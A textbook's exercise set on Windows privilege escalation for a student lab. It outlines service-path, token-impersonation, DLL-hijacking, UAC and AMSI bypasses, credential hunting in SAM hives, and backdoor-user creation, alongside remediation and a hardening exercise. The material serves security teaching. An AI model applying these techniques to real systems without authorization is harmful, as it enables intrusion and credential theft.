Chapter 16 Exercises: Windows Exploitation and Privilege Escalation

⚖️ Legal Note: All exercises must be performed on systems you own or have explicit authorization to test. Use your Student Home Lab Windows VMs.

Exercise 1: Windows Security Model Mapping

Difficulty: Beginner | Time: 20 minutes

Explore the Windows security model on your lab VM.

  1. Run whoami /all and document every field: SID, groups, privileges, and integrity level.
  2. Explain the meaning of each enabled/disabled privilege.
  3. Identify which privileges, if enabled, could be exploited for escalation.
  4. Compare the output for a standard user, a local administrator (non-elevated), and an elevated administrator.

Deliverable: A comparative table showing security contexts across the three privilege levels.

Exercise 2: Unquoted Service Path Discovery and Exploitation

Difficulty: Intermediate | Time: 30 minutes

  1. On your lab VM, create a service with an unquoted path containing spaces (e.g., C:\Program Files\My Custom App\service.exe).
  2. Configure the service to run as SYSTEM with Auto start.
  3. Identify the service using wmic and verify it appears in WinPEAS output.
  4. Determine which path locations Windows will try to resolve.
  5. Place a benign executable (e.g., calc.exe renamed) at an injection point.
  6. Restart the service and verify which binary executes.
  7. Document the fix: quote the service path.

Deliverable: Step-by-step exploitation walkthrough with screenshots.

Exercise 3: Token Impersonation with PrintSpoofer

Difficulty: Intermediate | Time: 25 minutes

  1. Set up an IIS web server on your lab VM running as a service account.
  2. Obtain a web shell as the IIS service account (iis apppool\defaultapppool).
  3. Verify that SeImpersonatePrivilege is enabled using whoami /priv.
  4. Transfer PrintSpoofer to the target and escalate to SYSTEM.
  5. Repeat the exercise using GodPotato.
  6. Document which Potato variant works on your specific Windows version.

Deliverable: Comparison of Potato attack variants with version compatibility notes.

Exercise 4: Service Permission Exploitation

Difficulty: Intermediate | Time: 30 minutes

  1. Create a vulnerable service where Authenticated Users have SERVICE_CHANGE_CONFIG permission.
  2. As a standard user, use sc config to change the service binary path to a payload.
  3. Restart the service and verify SYSTEM-level execution.
  4. Restore the original service configuration.
  5. Fix the service permissions using sc sdset.

Deliverable: Complete exploitation and remediation documentation.

Exercise 5: AlwaysInstallElevated Exploitation

Difficulty: Beginner | Time: 20 minutes

  1. Enable AlwaysInstallElevated in both HKLM and HKCU registry locations.
  2. Generate a malicious MSI using msfvenom.
  3. Install the MSI as a standard user and verify SYSTEM execution.
  4. Disable AlwaysInstallElevated and verify the fix.

Deliverable: Registry configuration screenshots and exploitation proof.

Exercise 6: DLL Hijacking Lab

Difficulty: Advanced | Time: 45 minutes

  1. Use Process Monitor (ProcMon) to identify DLL loading for a target service.
  2. Filter for CreateFile operations with NAME NOT FOUND results ending in .dll.
  3. Identify a writable directory in the DLL search path.
  4. Create a malicious DLL that logs execution (rather than spawning a shell, for safety).
  5. Place the DLL and verify it is loaded when the service starts.

Deliverable: ProcMon filter setup documentation and DLL hijacking proof.

Exercise 7: Credential Hunting Methodology

Difficulty: Beginner | Time: 25 minutes

Systematically search for credentials on your lab VM.

  1. Check for saved credentials using cmdkey /list.
  2. Search for unattend.xml files in standard locations.
  3. Examine PowerShell history.
  4. Check for AutoLogon credentials in the registry.
  5. Examine SAM/SYSTEM backup files.
  6. Search IIS configuration files for connection strings.
  7. Document each finding and its exploitation potential.

Deliverable: Credential hunting checklist with findings.

Exercise 8: UAC Bypass Techniques

Difficulty: Intermediate | Time: 30 minutes

  1. Log in as a local administrator and verify your integrity level is Medium.
  2. Attempt to perform an administrative action without elevation (expect failure).
  3. Use the fodhelper.exe UAC bypass technique to get a High integrity shell.
  4. Verify your elevated privileges with whoami /groups.
  5. Test the eventvwr.exe bypass as an alternative.
  6. Document the registry keys involved in each bypass.

Deliverable: UAC bypass documentation with before/after integrity level evidence.

Exercise 9: Windows Exploit Suggester

Difficulty: Beginner | Time: 20 minutes

  1. Capture systeminfo output from your lab VM.
  2. Run Windows Exploit Suggester (wesng) against the output.
  3. Filter results for "Elevation of Privilege" impact.
  4. For each suggested exploit, research whether it applies to your specific Windows version.
  5. Create a prioritized list of exploits by likelihood of success.

Deliverable: Exploit assessment report with prioritized findings.

Exercise 10: WinPEAS vs. PowerUp Comparison

Difficulty: Beginner | Time: 30 minutes

  1. Run WinPEAS (executable version) on your lab VM.
  2. Run PowerUp's Invoke-AllChecks in PowerShell.
  3. Run Seatbelt with -group=all.
  4. Compare findings across all three tools.
  5. Identify findings unique to each tool.
  6. Evaluate which tool is most effective in different scenarios (e.g., when PowerShell is restricted, when AV is active).

Deliverable: Comparative analysis with recommendation matrix.

Exercise 11: Scheduled Task Exploitation

Difficulty: Intermediate | Time: 25 minutes

  1. Create a scheduled task that runs a script as SYSTEM.
  2. Make the script writable by standard users.
  3. As a standard user, modify the script to add a backdoor user.
  4. Wait for the scheduled task to run and verify the new user was created.
  5. Fix the vulnerability by correcting file permissions.

Deliverable: Exploitation proof and remediation steps.

Exercise 12: Registry Autorun Persistence and Escalation

Difficulty: Intermediate | Time: 20 minutes

  1. Examine all autorun registry keys on your lab VM.
  2. Check file permissions on each referenced binary.
  3. If any binary is writable, document the privilege escalation opportunity.
  4. Add a benign autorun entry to HKCU and verify it executes on login.
  5. Verify detection: check if Windows Defender or other AV alerts on the autorun modification.

Deliverable: Registry autorun analysis report.

Exercise 13: AMSI Bypass Lab

Difficulty: Advanced | Time: 30 minutes

  1. Attempt to run a PowerShell script detected by AMSI (e.g., Invoke-Mimikatz).
  2. Observe the AMSI block and error message.
  3. Research and implement an AMSI bypass technique.
  4. Verify the previously blocked script now executes.
  5. Document the bypass technique and its detection opportunities.

Deliverable: AMSI bypass documentation with defensive detection guidance.

Exercise 14: SeBackupPrivilege Exploitation

Difficulty: Advanced | Time: 30 minutes

  1. Create a user account with SeBackupPrivilege (add to Backup Operators group).
  2. Use the privilege to copy the SAM and SYSTEM registry hives.
  3. Transfer the hives to your attack machine.
  4. Extract password hashes using secretsdump.py.
  5. Crack a hash to verify the technique worked.

Deliverable: Complete exploitation chain with hash extraction evidence.

Exercise 15: Windows Privilege Escalation Report

Difficulty: Advanced | Time: 60 minutes

Using your lab VM configured with multiple vulnerabilities, perform a complete privilege escalation assessment.

  1. Start as a standard domain user.
  2. Run automated enumeration tools.
  3. Identify and exploit at least two different privilege escalation vectors.
  4. Write a professional penetration test report including executive summary, technical findings with evidence, risk ratings, and remediation recommendations.

Deliverable: Full penetration test report following industry standards.

🔵 Blue Team Exercise: Windows Hardening

Difficulty: Intermediate | Time: 45 minutes

  1. Audit all services for unquoted paths and fix them.
  2. Review and restrict service account privileges.
  3. Disable AlwaysInstallElevated.
  4. Enable Credential Guard and LSA Protection.
  5. Configure Windows Event Log monitoring for privilege escalation indicators (Event IDs 4672, 4673, 4674, 7045).
  6. Deploy and configure LAPS for local admin passwords.
  7. Run WinPEAS and verify minimal findings.

Deliverable: Windows hardening checklist with before/after evidence.